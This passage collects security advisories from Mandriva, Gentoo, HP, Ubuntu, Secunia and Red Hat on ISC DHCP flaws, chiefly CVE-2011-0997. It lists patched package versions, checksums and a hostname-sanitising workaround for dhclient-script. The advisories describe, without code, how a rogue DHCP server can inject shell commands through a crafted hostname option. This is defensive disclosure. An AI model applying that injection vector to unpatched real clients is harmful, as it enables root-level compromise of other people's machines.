2009.0/x86_64/dhcp-common-4.1.2-0.4mdv2009.0.x86_64.rpm 4f9a9c9a9815697e17a65b942771e31d 2009.0/x86_64/dhcp-devel-4.1.2-0.4mdv2009.0.x86_64.rpm df18345c665846817880f815af0ad0e8 2009.0/x86_64/dhcp-doc-4.1.2-0.4mdv2009.0.x86_64.rpm eac313ff664e3ea9f8e4c3818d7b7387 2009.0/x86_64/dhcp-relay-4.1.2-0.4mdv2009.0.x86_64.rpm 48cca35591072588de0e1b9f00ca88eb 2009.0/x86_64/dhcp-server-4.1.2-0.4mdv2009.0.x86_64.rpm 18489ac449e257f1fa9aad9e7a054b45 2009.0/SRPMS/dhcp-4.1.2-0.4mdv2009.0.src.rpm Mandriva Linux 2010.0: 88ba2b9d0ccfddf8b1b6f516851d08ce 2010.0/i586/dhcp-client-4.1.2-0.4mdv2010.0.i586.rpm 1475209ee7b9fb9b7f26ad5b20afcdcf 2010.0/i586/dhcp-common-4.1.2-0.4mdv2010.0.i586.rpm ea29d2bfd21b02a56057cd36dc21f43a 2010.0/i586/dhcp-devel-4.1.2-0.4mdv2010.0.i586.rpm 067c3ac4f7530e447f82bbe4326253a3 2010.0/i586/dhcp-doc-4.1.2-0.4mdv2010.0.i586.rpm 409516cfb0004d5f4522040b81433ce7 2010.0/i586/dhcp-relay-4.1.2-0.4mdv2010.0.i586.rpm a23871dfa6632571cdf4a2559941ad89 2010.0/i586/dhcp-server-4.1.2-0.4mdv2010.0.i586.rpm 265c9ec68af7e23baf8b1b6fcc4cc64f 2010.0/SRPMS/dhcp-4.1.2-0.4mdv2010.0.src.rpm Mandriva Linux 2010.0/X86_64: 403dfe148141d926bc2f5e31c18360ba 2010.0/x86_64/dhcp-client-4.1.2-0.4mdv2010.0.x86_64.rpm 2cd0331b9935442a68d606e1d58b0608 2010.0/x86_64/dhcp-common-4.1.2-0.4mdv2010.0.x86_64.rpm 80a31ea430793ce9d2269c9d31aa03bd 2010.0/x86_64/dhcp-devel-4.1.2-0.4mdv2010.0.x86_64.rpm d5053dc644215e70dfc5380afdbc90c4 2010.0/x86_64/dhcp-doc-4.1.2-0.4mdv2010.0.x86_64.rpm 377fe3099561dd0a795617977164b91f 2010.0/x86_64/dhcp-relay-4.1.2-0.4mdv2010.0.x86_64.rpm 57b98ba8696c7a7d20ab96a823f4ff0d 2010.0/x86_64/dhcp-server-4.1.2-0.4mdv2010.0.x86_64.rpm 265c9ec68af7e23baf8b1b6fcc4cc64f 2010.0/SRPMS/dhcp-4.1.2-0.4mdv2010.0.src.rpm Mandriva Linux 2010.1: 5b603213aa47a9772cf786ae6ee046da 2010.1/i586/dhcp-client-4.1.2-0.4mdv2010.2.i586.rpm 3046be07aaa09d1b39fcc8c07ef25e58 2010.1/i586/dhcp-common-4.1.2-0.4mdv2010.2.i586.rpm 1b5a481f6db0b53e666884cfda6ac44c 2010.1/i586/dhcp-devel-4.1.2-0.4mdv2010.2.i586.rpm 279beab531b59a715c946a00bd58fc48 2010.1/i586/dhcp-doc-4.1.2-0.4mdv2010.2.i586.rpm a328ab24b56f1ac03f8f420acd0a3806 2010.1/i586/dhcp-relay-4.1.2-0.4mdv2010.2.i586.rpm f7c61c55748270add2fe45d3245895c8 2010.1/i586/dhcp-server-4.1.2-0.4mdv2010.2.i586.rpm 30d4e8965d393765fb98b425889df126 2010.1/SRPMS/dhcp-4.1.2-0.4mdv2010.2.src.rpm Mandriva Linux 2010.1/X86_64: 27f78c74028b1ea64dbd596c05cfa83f 2010.1/x86_64/dhcp-client-4.1.2-0.4mdv2010.2.x86_64.rpm ab56614386900415fecba15f4c17db13 2010.1/x86_64/dhcp-common-4.1.2-0.4mdv2010.2.x86_64.rpm 535a2eb4b6a4b1f78f47201e0b4249c3 2010.1/x86_64/dhcp-devel-4.1.2-0.4mdv2010.2.x86_64.rpm 64e9bac6fe8f4dbee3e1aebd5d91e977 2010.1/x86_64/dhcp-doc-4.1.2-0.4mdv2010.2.x86_64.rpm 612892e71f2aeddfd8b55cd7ac220247 2010.1/x86_64/dhcp-relay-4.1.2-0.4mdv2010.2.x86_64.rpm 9bb46bca8de30ee4b99bfe09867a3924 2010.1/x86_64/dhcp-server-4.1.2-0.4mdv2010.2.x86_64.rpm 30d4e8965d393765fb98b425889df126 2010.1/SRPMS/dhcp-4.1.2-0.4mdv2010.2.src.rpm Corporate 4.0: f49d86732da26402b022b2d980049c03 corporate/4.0/i586/dhcp-client-4.1.2-0.4.20060mlcs4.i586.rpm acd985bc51c25cc42325befb357b0dcc corporate/4.0/i586/dhcp-common-4.1.2-0.4.20060mlcs4.i586.rpm c01506a802e46af23c8f10a72c6a0eb2 corporate/4.0/i586/dhcp-devel-4.1.2-0.4.20060mlcs4.i586.rpm 81522530fa5e97057d6eeea18ad7bec3 corporate/4.0/i586/dhcp-doc-4.1.2-0.4.20060mlcs4.i586.rpm 2ebfdf7ee9224b7403c4ab5e8370d9ab corporate/4.0/i586/dhcp-relay-4.1.2-0.4.20060mlcs4.i586.rpm c2bbacf8934b9e3dc78cdb49cd811ec9 corporate/4.0/i586/dhcp-server-4.1.2-0.4.20060mlcs4.i586.rpm ac3031a0c5dfeb6274aa28d669e66cba corporate/4.0/SRPMS/dhcp-4.1.2-0.4.20060mlcs4.src.rpm Corporate 4.0/X86_64: 2747bf835e111141b9a91dc320eeab43 corporate/4.0/x86_64/dhcp-client-4.1.2-0.4.20060mlcs4.x86_64.rpm 0c998112346a5da94e09d55c996d6dff corporate/4.0/x86_64/dhcp-common-4.1.2-0.4.20060mlcs4.x86_64.rpm fd38ef505da0c593ef900895abeb1ddc corporate/4.0/x86_64/dhcp-devel-4.1.2-0.4.20060mlcs4.x86_64.rpm 69b3d6cbf21c46828de40a322fd1310d corporate/4.0/x86_64/dhcp-doc-4.1.2-0.4.20060mlcs4.x86_64.rpm c5acb788ae76e674952d656fa9b0d1a5 corporate/4.0/x86_64/dhcp-relay-4.1.2-0.4.20060mlcs4.x86_64.rpm e19db50139a291a7acd23491af5f8d54 corporate/4.0/x86_64/dhcp-server-4.1.2-0.4.20060mlcs4.x86_64.rpm ac3031a0c5dfeb6274aa28d669e66cba corporate/4.0/SRPMS/dhcp-4.1.2-0.4.20060mlcs4.src.rpm Mandriva Enterprise Server 5: 7cbe686b047a6fd6f95cda44669e5862 mes5/i586/dhcp-client-4.1.2-0.4mdvmes5.2.i586.rpm af8b9fe15591b76c11f2257e0cb43a37 mes5/i586/dhcp-common-4.1.2-0.4mdvmes5.2.i586.rpm 2a22a53e6de1a9333c36c5cc250c5ac4 mes5/i586/dhcp-devel-4.1.2-0.4mdvmes5.2.i586.rpm 9ca551145fc79919000a61419e72de37 mes5/i586/dhcp-doc-4.1.2-0.4mdvmes5.2.i586.rpm e9faa5fae712882720b107eb02e51f1f mes5/i586/dhcp-relay-4.1.2-0.4mdvmes5.2.i586.rpm 8568f3bac9dd6654b63ebee94c33275e mes5/i586/dhcp-server-4.1.2-0.4mdvmes5.2.i586.rpm 0e5415cf40dde2931cd1b81aada5e7f7 mes5/SRPMS/dhcp-4.1.2-0.4mdvmes5.2.src.rpm Mandriva Enterprise Server 5/X86_64: 87ae497e9b94fb842718b4fbefb55474 mes5/x86_64/dhcp-client-4.1.2-0.4mdvmes5.2.x86_64.rpm 71d70558972e1f0729513fce69183de2 mes5/x86_64/dhcp-common-4.1.2-0.4mdvmes5.2.x86_64.rpm 0f12150d87816bd1770388d8dc309d21 mes5/x86_64/dhcp-devel-4.1.2-0.4mdvmes5.2.x86_64.rpm 0450f2a86dab4988d1c96a8e9747104f mes5/x86_64/dhcp-doc-4.1.2-0.4mdvmes5.2.x86_64.rpm 6a043f417310b6229e8fb8d967c12a8d mes5/x86_64/dhcp-relay-4.1.2-0.4mdvmes5.2.x86_64.rpm e4281f48c410412f60fd33f095b9199c mes5/x86_64/dhcp-server-4.1.2-0.4mdvmes5.2.x86_64.rpm 0e5415cf40dde2931cd1b81aada5e7f7 mes5/SRPMS/dhcp-4.1.2-0.4mdvmes5.2.src.rpm _______________________________________________________________________ To upgrade automatically use MandrivaUpdate or urpmi. The verification of md5 checksums and GPG signatures is performed automatically for you. CVSS Score: 6.8 (AV:A/AC:L/Au:N/C:P/I:N/A:C) For more information on CVSS scores, visit http://nvd.nist.gov/cvss.cfm?calculator&adv&version=2 Workarounds: On SUSE systems, it is possible to disable hostname update by setting DHCLIENT_SET_HOSTNAME="no" in /etc/sysconfig/network/dhcp. Other systems may add following line to dhclient-script at the beginning of the set_hostname() function: new_host_name=${new_host_name//[^-.a-zA-Z0-9]/} In environments where filters/acls can be put into place to limit clients to accessing only legitimate dhcp servers, this will protect clients from rogue dhcp servers deliberately trying to exploit this bug. However, this will not protect from compromised servers. Active exploits: None known at this time. https://www.isc.org/downloads/all No patch is available for 4.0.x as it is EOL. Anyone running 4.1.x should upgrade to 4.1-ESV-R2. These options are reused in an insecure fashion by dhclient scripts. For the oldstable distribution (lenny), this problem has been fixed in additional update for dhcp3. For the stable distribution (squeeze), this problem has been fixed in version 4.1.1-P1-15+squeeze2. For the testing distribution (wheezy), this problem will be fixed soon. For the unstable distribution (sid), this problem has been fixed in version 4.1.1-P1-16.1. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 201301-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: ISC DHCP: Denial of Service Date: January 09, 2013 Bugs: #362453, #378799, #393617, #398763, #428120, #434880 ID: 201301-06 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis ======== Multiple vulnerabilities have been found in ISC DHCP, the worst of which may allow remote Denial of Service. Affected packages ================= ------------------------------------------------------------------- Package / Vulnerable / Unaffected ------------------------------------------------------------------- 1 net-misc/dhcp < 4.2.4_p2 >= 4.2.4_p2 Description =========== Multiple vulnerabilities have been discovered in ISC DHCP. Please review the CVE identifiers referenced below for details. Resolution ========== All ISC DHCP users should upgrade to the latest version: # emerge --sync # emerge --ask --oneshot --verbose ">=net-misc/dhcp-4.2.4_p2" References ========== [ 1 ] CVE-2011-0997 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-0997 [ 2 ] CVE-2011-2748 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2748 [ 3 ] CVE-2011-2749 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-2749 [ 4 ] CVE-2011-4539 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4539 [ 5 ] CVE-2011-4868 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2011-4868 [ 6 ] CVE-2012-3570 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3570 [ 7 ] CVE-2012-3571 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3571 [ 8 ] CVE-2012-3954 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3954 [ 9 ] CVE-2012-3955 http://nvd.nist.gov/nvd.cfm?cvename=CVE-2012-3955 Availability ============ This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-201301-06.xml Concerns? ========= Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users' machines is of utmost importance to us. Any security concerns should be addressed to security@gentoo.org or alternatively, you may file a bug at https://bugs.gentoo.org. License ======= Copyright 2013 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.5 . Release Date: 2012-03-20 Last Updated: 2012-03-20 Potential Security Impact: Remote execution of arbitrary code, Denial of Service (DoS) Source: Hewlett-Packard Company, HP Software Security Response Team VULNERABILITY SUMMARY Potential security vulnerabilities have been identified with HP Insight Control Software for Linux (IC-Linux). References: CVE-2011-3210, CVE-2011-3207, CVE-2011-1097, CVE-2011-0997, CVE-2011-0762, CVE-2010-4645 SUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed. HP Insight Control Software for Linux (IC-Linux) before v7.0 BACKGROUND CVSS 2.0 Base Metrics =========================================================== Reference Base Vector Base Score CVE-2011-3210 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 CVE-2011-3207 (AV:N/AC:L/Au:N/C:N/I:P/A:N) 5.0 CVE-2011-1097 (AV:N/AC:H/Au:N/C:P/I:P/A:P) 5.1 CVE-2011-0997 (AV:N/AC:L/Au:N/C:P/I:P/A:P) 7.5 CVE-2011-0762 (AV:N/AC:L/Au:S/C:N/I:N/A:P) 4.0 CVE-2010-4645 (AV:N/AC:L/Au:N/C:N/I:N/A:P) 5.0 =========================================================== Information on CVSS is documented in HP Customer Notice: HPSN-2008-002 RESOLUTION HP has provided HP Insight Control Software for Linux (IC-Linux) v7.0 to resolve the vulnerabilities. IC-Linux v7.0 is available here: http://h18004.www1.hp.com/products/servers/management/insightcontrol_linux2/index.html HISTORY Version:1 (rev.1) - 20 March 2012 Initial release Third Party Security Patches: Third party security patches that are to be installed on systems running HP software products should be applied in accordance with the customer's patch management policy. Support: For issues about implementing the recommendations of this Security Bulletin, contact normal HP Services support channel. For other issues about the content of this Security Bulletin, send e-mail to security-alert@hp.com. Report: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com Subscribe: To initiate a subscription to receive future HP Security Bulletin alerts via Email: http://h41183.www4.hp.com/signup_alerts.php?jumpid=hpsc_secbulletins Security Bulletin List: A list of HP Security Bulletins, updated periodically, is contained in HP Security Notice HPSN-2011-001: https://h20566.www2.hp.com/portal/site/hpsc/public/kb/docDisplay/?docId=emr_na-c02964430 Security Bulletin Archive: A list of recently released Security Bulletins is available here: http://h20566.www2.hp.com/portal/site/hpsc/public/kb/secBullArchive/ Software Product Category: The Software Product Category is represented in the title by the two characters following HPSB. 3C = 3COM 3P = 3rd Party Software GN = HP General Software HF = HP Hardware and Firmware MP = MPE/iX MU = Multi-Platform Software NS = NonStop Servers OV = OpenVMS PI = Printing and Imaging PV = ProCurve ST = Storage Software TU = Tru64 UNIX UX = HP-UX Copyright 2012 Hewlett-Packard Development Company, L.P. Hewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The information provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its affiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime cost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or software restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the names of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other countries. Other product and company names mentioned herein may be trademarks of their respective owners. This issue is addressed by stripping shell meta-characters in dhclient-script. It is recommended that AirPort Utility 5.5.3 or later be installed before upgrading to Firmware version 7.6. ========================================================================== Ubuntu Security Notice USN-1108-2 April 19, 2011 dhcp3 vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: - Ubuntu 10.10 - Ubuntu 10.04 LTS - Ubuntu 9.10 Summary: An attacker's DHCP server could send crafted responses to your computer and cause it to run programs as root. Due to an error, the patch to fix the vulnerability was not properly applied on Ubuntu 9.10 and higher. Original advisory details: Sebastian Krahmer discovered that the dhclient utility incorrectly filtered crafted responses. Update instructions: The problem can be corrected by updating your system to the following package versions: Ubuntu 10.10: dhcp3-client 3.1.3-2ubuntu6.2 Ubuntu 10.04 LTS: dhcp3-client 3.1.3-2ubuntu3.2 Ubuntu 9.10: dhcp3-client 3.1.2-1ubuntu7.3 In general, a standard system update will make all the necessary changes. ---------------------------------------------------------------------- Q1 Factsheets released: http://secunia.com/resources/factsheets/2011_vendor/ ---------------------------------------------------------------------- TITLE: ISC DHCP "dhclient" Response Processing Input Sanitation Vulnerability SECUNIA ADVISORY ID: SA44037 VERIFY ADVISORY: Secunia.com http://secunia.com/advisories/44037/ Customer Area (Credentials Required) https://ca.secunia.com/?page=viewadvisory&vuln_id=44037 RELEASE DATE: 2011-04-07 DISCUSS ADVISORY: http://secunia.com/advisories/44037/#comments AVAILABLE ON SITE AND IN CUSTOMER AREA: * Last Update * Popularity * Comments * Criticality Level * Impact * Where * Solution Status * Operating System / Software * CVE Reference(s) http://secunia.com/advisories/44037/ ONLY AVAILABLE IN CUSTOMER AREA: * Authentication Level * Report Reliability * Secunia PoC * Secunia Analysis * Systems Affected * Approve Distribution * Remediation Status * Secunia CVSS Score * CVSS https://ca.secunia.com/?page=viewadvisory&vuln_id=44037 ONLY AVAILABLE WITH SECUNIA CSI AND SECUNIA PSI: * AUTOMATED SCANNING http://secunia.com/vulnerability_scanning/personal/ http://secunia.com/vulnerability_scanning/corporate/wsus_sccm_3rd_third_party_patching/ DESCRIPTION: A vulnerability has been reported in ISC DHCP, which can be exploited by malicious people to compromise a vulnerable system. This can be exploited to submit shell commands to the "dhclient-script" script via e.g. a specially crafted "hostname" response. SOLUTION: Update to version 3.1-ESV-R1 and 4.1-ESV-R2 or 4.2.1-P1. Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ PROVIDED AND/OR DISCOVERED BY: The vendor credits Sebastian Krahmer and Marius Tomaschewski, SUSE Security Team. ORIGINAL ADVISORY: https://www.isc.org/software/dhcp/advisories/cve-2011-0997 OTHER REFERENCES: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ DEEP LINKS: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED DESCRIPTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXTENDED SOLUTION: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ EXPLOIT: Further details available in Customer Area: http://secunia.com/products/corporate/EVM/ ---------------------------------------------------------------------- About: This Advisory was delivered by Secunia as a free service to help private users keeping their systems up to date against the latest vulnerabilities. Subscribe: http://secunia.com/advisories/secunia_security_advisories/ Definitions: (Criticality, Where etc.) http://secunia.com/advisories/about_secunia_advisories/ Please Note: Secunia recommends that you verify all advisories you receive by clicking the link. Secunia NEVER sends attached files with advisories. Secunia does not advise people to install third party patches, only use those supplied by the vendor. ---------------------------------------------------------------------- Unsubscribe: Secunia Security Advisories http://secunia.com/sec_adv_unsubscribe/?email=packet%40packetstormsecurity.org ---------------------------------------------------------------------- . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 ===================================================================== Red Hat Security Advisory Synopsis: Important: dhcp security update Advisory ID: RHSA-2011:0840-01 Product: Red Hat Enterprise Linux Advisory URL: https://rhn.redhat.com/errata/RHSA-2011-0840.html Issue date: 2011-05-31 CVE Names: CVE-2011-0997 ===================================================================== 1. Summary: Updated dhcp packages that fix one security issue are now available for Red Hat Enterprise Linux 3 Extended Life Cycle Support. The Red Hat Security Response Team has rated this update as having important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section. 2. Relevant releases/architectures: Red Hat Enterprise Linux AS (v. 3 ELS) - i386 Red Hat Enterprise Linux ES (v. 3 ELS) - i386 3. Description: The Dynamic Host Configuration Protocol (DHCP) is a protocol that allows individual devices on an IP network to get their own network configuration information, including an IP address, a subnet mask, and a broadcast address. A malicious DHCP server could send such an option with a specially-crafted value to a DHCP client. If this option's value was saved on the client system, and then later insecurely evaluated by a process that assumes the option is trusted, it could lead to arbitrary code execution with the privileges of that process. (CVE-2011-0997) Red Hat would like to thank Sebastian Krahmer of the SuSE Security Team for reporting this issue. All dhclient users should upgrade to these updated packages, which contain a backported patch to correct this issue. 4. Solution: Before applying this update, make sure all previously-released errata relevant to your system have been applied. This update is available via the Red Hat Network. Details on how to use the Red Hat Network to apply this update are available at https://access.redhat.com/kb/docs/DOC-11259 5. Bugs fixed (http://bugzilla.redhat.com/): 689832 - CVE-2011-0997 dhclient: insufficient sanitization of certain DHCP response values 6. Package List: Red Hat Enterprise Linux AS (v. 3 ELS): Source: dhcp-3.0.1-10.3_EL3.src.rpm i386: dhclient-3.0.1-10.3_EL3.i386.rpm dhcp-3.0.1-10.3_EL3.i386.rpm dhcp-debuginfo-3.0.1-10.3_EL3.i386.rpm dhcp-devel-3.0.1-10.3_EL3.i386.rpm Red Hat Enterprise Linux ES (v. 3 ELS): Source: dhcp-3.0.1-10.3_EL3.src.rpm i386: dhclient-3.0.1-10.3_EL3.i386.rpm dhcp-3.0.1-10.3_EL3.i386.rpm dhcp-debuginfo-3.0.1-10.3_EL3.i386.rpm dhcp-devel-3.0.1-10.3_EL3.i386.rpm These packages are GPG signed by Red Hat for security. Our key and details on how to verify the signature are available from https://access.redhat.com/security/team/key/#package 7. References: https://www.redhat.com/security/data/cve/CVE-2011-0997.html https://access.redhat.com/security/updates/classification/#important 8. Contact: The Red Hat security contact is &lt;secalert@redhat.com&gt;. More contact details at https://access.redhat.com/security/team/contact/ Copyright 2011 Red Hat, Inc. -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.4.4 (GNU/Linux) iD8DBQFN5QSLXlSAg2UNWIIRAsdVAJ9mkD7RcbzsYOkK8JnEQsRSeelYuwCeNmZd LdK24/RBkJXiFOiY5pI8Eig= =HTuE -----END PGP SIGNATURE----- -- RHSA-announce mailing list RHSA-announce@redhat.com https://www.redhat.com/mailman/listinfo/rhsa-announce . Updated packages for Ubuntu 6.06 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.0.3-6ubuntu7.2.diff.gz Size/MD5: 68426 b4a36d1b44e8276211cef0b9bfbb6ea5 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.0.3-6ubuntu7.2.dsc Size/MD5: 1428 2fe76544defdfa3d4ab61d548ea5bc03 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.0.3.orig.tar.gz Size/MD5: 870240 f91416a0b8ed3fd0601688cf0b7df58f amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.0.3-6ubuntu7.2_amd64.deb Size/MD5: 221524 2cc3c7815cb6e6a2cc21d0c2a6286202 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.0.3-6ubuntu7.2_amd64.deb Size/MD5: 454060 4d6e00d001d85359af4777316c012038 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.0.3-6ubuntu7.2_amd64.deb Size/MD5: 131252 bf862b9ce2cc9888f9e617f42c0d8f77 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.0.3-6ubuntu7.2_amd64.deb Size/MD5: 321024 383390887daadd122e7e66a9896e0432 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-client-udeb_3.0.3-6ubuntu7.2_amd64.udeb Size/MD5: 177440 04a6bc2b53da66245b8b79b71d8f82ed http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.0.3-6ubuntu7.2_amd64.deb Size/MD5: 105842 9616c95d8f2d487fd330fb9b33c58474 i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.0.3-6ubuntu7.2_i386.deb Size/MD5: 196930 ebaee96958395481e8c9c25a6591c1a3 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.0.3-6ubuntu7.2_i386.deb Size/MD5: 431162 6fec8eaee0c753e95193f507e3c2c1eb http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.0.3-6ubuntu7.2_i386.deb Size/MD5: 117544 76fd573dc96ade71033c31e9965a1ede http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.0.3-6ubuntu7.2_i386.deb Size/MD5: 289684 8d0c386dc142ca3e69766e26fa6ced00 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-client-udeb_3.0.3-6ubuntu7.2_i386.udeb Size/MD5: 152296 98cdda8ba797a8f3532e2db2c95f5329 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.0.3-6ubuntu7.2_i386.deb Size/MD5: 94176 369f369a8fd6b58df3e293a5264c8047 powerpc architecture (Apple Macintosh G3/G4/G5): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.0.3-6ubuntu7.2_powerpc.deb Size/MD5: 203612 da623d9e1694169cfc1de56f2e0df6e4 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.0.3-6ubuntu7.2_powerpc.deb Size/MD5: 435818 a6f18c0a5083885f0f3ad270a52f1ea9 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.0.3-6ubuntu7.2_powerpc.deb Size/MD5: 130290 8ed50d04b1c91276b0bdf19b3cda3fcd http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.0.3-6ubuntu7.2_powerpc.deb Size/MD5: 297742 95b7742e4fb7c4720add03965ef51b45 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-client-udeb_3.0.3-6ubuntu7.2_powerpc.udeb Size/MD5: 158466 61e6403a4a5db1783c43fbfe6ad74e8c http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.0.3-6ubuntu7.2_powerpc.deb Size/MD5: 96696 a7d275b7895e47d8141fab29a3db415b sparc architecture (Sun SPARC/UltraSPARC): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.0.3-6ubuntu7.2_sparc.deb Size/MD5: 200826 04fe774f2349b12af88465a96a4443b4 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.0.3-6ubuntu7.2_sparc.deb Size/MD5: 434238 c71c8b52f5324385d13e3610e7bef30e http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.0.3-6ubuntu7.2_sparc.deb Size/MD5: 126784 ca67a9bd308dfb73bf85906f53e8ae6b http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.0.3-6ubuntu7.2_sparc.deb Size/MD5: 294084 628696dfa6a0c9a2713b7fde4390d700 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-client-udeb_3.0.3-6ubuntu7.2_sparc.udeb Size/MD5: 156068 907d41b490e6155c580b83cec96e3f71 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.0.3-6ubuntu7.2_sparc.deb Size/MD5: 96810 d1559518c2fc467cf6244ee8cd29176b Updated packages for Ubuntu 8.04 LTS: Source archives: http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.0.6.dfsg-1ubuntu9.2.diff.gz Size/MD5: 97783 a2e0e7077df662a15c039c462ecd8e3d http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.0.6.dfsg-1ubuntu9.2.dsc Size/MD5: 1537 ccf77a9747dc8cbc6b65e0d94ab9c43b http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3_3.0.6.dfsg.orig.tar.gz Size/MD5: 724045 e89ef34005c576ddbb229e3b4478f6e2 amd64 architecture (Athlon64, Opteron, EM64T Xeon): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.0.6.dfsg-1ubuntu9.2_amd64.udeb Size/MD5: 180140 9b8c326a22be742b43e2b8d9b07d4f86 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.0.6.dfsg-1ubuntu9.2_amd64.deb Size/MD5: 242126 8053c2330e512d48f0318af10079c50a http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.0.6.dfsg-1ubuntu9.2_amd64.deb Size/MD5: 300696 15bbfae5ba97f27d0c896b886773f02b http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.0.6.dfsg-1ubuntu9.2_amd64.deb Size/MD5: 124032 82fe33e521c7ee08b7a00596acc8cb8d http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.0.6.dfsg-1ubuntu9.2_amd64.deb Size/MD5: 342596 40acd4d59e72be79a5c930254bee0223 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.0.6.dfsg-1ubuntu9.2_amd64.deb Size/MD5: 114396 5e5c7a86cec5ef70f927cbf53fffec4d i386 architecture (x86 compatible Intel/AMD): http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client-udeb_3.0.6.dfsg-1ubuntu9.2_i386.udeb Size/MD5: 159988 7c2cd082adad4cdae500b88b9429ea24 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-client_3.0.6.dfsg-1ubuntu9.2_i386.deb Size/MD5: 221966 92748d084525779ad31fe09ae76ca8d5 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-common_3.0.6.dfsg-1ubuntu9.2_i386.deb Size/MD5: 281564 0e64a350c9599b473f42949dbaa44533 http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-dev_3.0.6.dfsg-1ubuntu9.2_i386.deb Size/MD5: 109818 5ef8d14534865cdf0b63699e54ab684a http://security.ubuntu.com/ubuntu/pool/main/d/dhcp3/dhcp3-server_3.0.6.dfsg-1ubuntu9.2_i386.deb Size/MD5: 318748 205746468ea8d58f1babe96c28f46983 http://security.ubuntu.com/ubuntu/pool/universe/d/dhcp3/dhcp3-relay_3.0.6.dfsg-1ubuntu9.2_i386.deb Size/MD5: 103376 15e19ab3867304e29f59f3e97170f145 lpia architecture (Low Power Intel Architecture): 